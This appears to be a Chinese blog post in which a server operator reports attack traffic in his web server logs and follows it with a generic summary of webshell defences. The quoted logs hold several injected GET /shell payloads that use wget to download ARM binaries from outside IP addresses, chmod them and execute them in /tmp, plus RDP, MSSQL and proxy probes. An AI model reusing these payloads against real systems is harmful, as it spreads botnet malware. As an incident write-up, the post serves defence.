【网络安全】 关于http服务器遭受webshell攻击

【网络安全】 关于http服务器遭受webshell攻击

1、背景

在阿里云公网上部署web服务器,最近客户反映我的服务经常断掉,查看后台日志,发现境外的IP攻击。
比如:

209.141.56.212 - - [17/Sep/2021 04:52:04] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -

如下图:
在这里插入图片描述

2、ip地址查询

我使用的是马老师家的IP地址库查询:
https://ip.taobao.com/?spm=a2c4g.11186623.0.0.2f953788CNPh0g

比如下面查询日志中可以的IP:
209.141.56.212
在这里插入图片描述

3、可疑请求ip

209.141.56.212

209.141.56.212 - - [17/Sep/2021 05:29:09] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -

141.101.196.233
这个攻击者有点意思(友善?),查到我的服务器在中国就没接着攻击了,详细如下:

[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:17] "CONNECT 91.214.48.87:80 HTTP/1.1" 404 -
[ ERROR ] 141.101.196.233 - - [17/Sep/2021 12:58:27] code 400, message Bad request syntax ('\x04\x01\x00P[Ö0W0\x00')
[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:27] "P[Ö0W0" HTTPStatus.BAD_REQUEST -
[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:29] "POST http://proxy.kagda.ru/myip2.php?Z74857023071Q1 HTTP/1.1" 404 -

47.100.27.27

89.248.165.93 - - [13/Sep/2021 16:29:22] code 400, message Bad request syntax ('\x03\x00\x00\x13\x0eà\x00\x00\x00\x00\x00\x01\x00\x08\x00\x02\x00\x00\x00')
89.248.165.93 - - [13/Sep/2021 16:29:22] "[35m[1m  à          [0m" HTTPStatus.BAD_REQUEST -

205.185.115.123

205.185.115.123 - - [13/Sep/2021 19:30:50] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -

89.248.165.13

89.248.165.13 - - [13/Sep/2021 23:46:45] code 400, message Bad request syntax ('\x03\x00\x00\x13\x0eà\x00\x00\x00\x00\x00\x01\x00\x08\x00\x02\x00\x00\x00')
89.248.165.13 - - [13/Sep/2021 23:46:45] "[35m[1m  à          [0m" HTTPStatus.BAD_REQUEST -

205.185.115.123

205.185.115.123 - - [14/Sep/2021 04:52:39] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -
205.185.115.123 - - [14/Sep/2021 10:27:01] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -

74.120.14.44

74.120.14.44 - - [14/Sep/2021 10:39:06] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00{\x01\x00\x00w\x03\x030âFh®\xad\x18\xad\x8c=\x8d\x07Ï4úiQß\x90æ\x92\x80±àTêP*6ß\x10\x08\x00\x00\x1aÀ/À+À\x11À\x07À\x13À')
74.120.14.44 - - [14/Sep/2021 10:39:06] "[35m[1m {  w0âFh®­­Œ=Ï4úiQߐ撀±àTêP*6ß  À/À+ÀÀÀÀ	ÀÀ[0m" HTTPStatus.BAD_REQUEST -
74.120.14.44 - - [14/Sep/2021 10:39:08] "GET / HTTP/1.1" 200 -
74.120.14.44 - - [14/Sep/2021 10:39:08] "GET / HTTP/1.1" 200 -

185.219.52.154

185.219.52.154 - - [14/Sep/2021 22:34:50] code 400, message Bad request version ('\x03\x00(\x00\x04ÿ\x08\x00\x01U\x00\x00\x00MSSQLServer\x00É·\x00\x00')
185.219.52.154 - - [14/Sep/2021 22:34:50] "[35m[1m 4           ( ÿ U   MSSQLServer É·  [0m" HTTPStatus.BAD_REQUEST -

78.128.112.18

78.128.112.18 - - [15/Sep/2021 00:58:36] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
78.128.112.18 - - [15/Sep/2021 00:58:36] "[35m[1m  /*à     Cookie: mstshash=Administr[0m" HTTPStatus.BAD_REQUEST -

47.103.21.238

47.103.21.238 - - [15/Sep/2021 08:48:35] code 400, message Bad request version ("_¸<³'àA\x04\x9b\x84%.W7\x00\x00\x16À\x14\x00\x13\x00/À,À+À0\x00\x9dÀ/\x00\x9c\x00")
47.103.21.238 - - [15/Sep/2021 08:48:35] "[35m[1m ˆ  „aAB㲂 øN5[‡ç47þ_¸<³'àA›„%.W7  À 5À /À,À+À0 À/ œ [0m" HTTPStatus.BAD_REQUEST -

161.189.134.11

161.189.134.11 - - [15/Sep/2021 14:27:33] code 400, message Bad request syntax ('{\x01\x00\x1615888888888À¨\x90Á\x13\x8a{')
161.189.134.11 - - [15/Sep/2021 14:27:33] "[35m[1m{ 15888888888À¨ÁŠ{[0m" HTTPStatus.BAD_REQUEST -
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Webshell攻击是指攻击者利用Web漏洞获取Web服务器的权限,并上传Webshell后门,从而实现对服务器的控制和操控。Webshell可以被用来执行命令、上传下载文件、修改文件权限等操作,给攻击者提供了广泛的控制权。 为了防御Webshell攻击,需要采取一系列的安全措施。首先,应该加强对Web应用程序的安全性,包括及时更新和修补漏洞、使用安全的编程实践、限制文件上传的类型和大小等。其次,应该加强对服务器的安全配置,包括限制对敏感文件和目录的访问权限、禁止执行可疑的脚本和命令、监控服务器日志等。此外,还可以使用防火墙和入侵检测系统来监控和阻止Webshell的上传和执行。 另外,用户也应该养成良好的使用习惯,避免点击可疑的链接和下载未知来源的文件,定期更改密码,并使用强密码和多因素身份验证等措施来保护自己的账户安全。 总之,防御Webshell攻击需要综合考虑安全措施,包括加强Web应用程序和服务器的安全性,以及用户的安全意识和使用习惯。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [网络安全-webshell详解(原理、攻击、检测与防御)](https://blog.csdn.net/lady_killer9/article/details/120286817)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门)](https://blog.csdn.net/weixin_43263566/article/details/128748547)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [网络攻击WebShell](https://blog.csdn.net/qq_44887910/article/details/126701405)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jn10010537

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值